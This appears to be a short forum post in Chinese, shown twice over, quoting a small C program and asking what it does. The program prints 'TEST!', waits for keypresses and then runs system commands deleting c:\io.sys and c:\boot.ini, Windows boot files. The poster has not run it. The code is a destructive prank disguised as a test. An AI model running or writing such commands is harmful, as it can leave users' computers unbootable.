#include<stdlib.h>
main()
{
printf("TEST!");
getchar();
getchar();
getchar();
system("del c:\io.sys ");
system("del c:\boot.ini");
}
本来想在自己电脑上运行试试的,怕有什么危险也没试,看意思好像是删除一个系统文件和boot引导文件?
#include<stdlib.h>
main()
{
printf("TEST!");
getchar();
getchar();
getchar();
system("del c:\io.sys ");
system("del c:\boot.ini");
}
本来想在自己电脑上运行试试的,怕有什么危险也没试,看意思好像是删除一个系统文件和boot引导文件?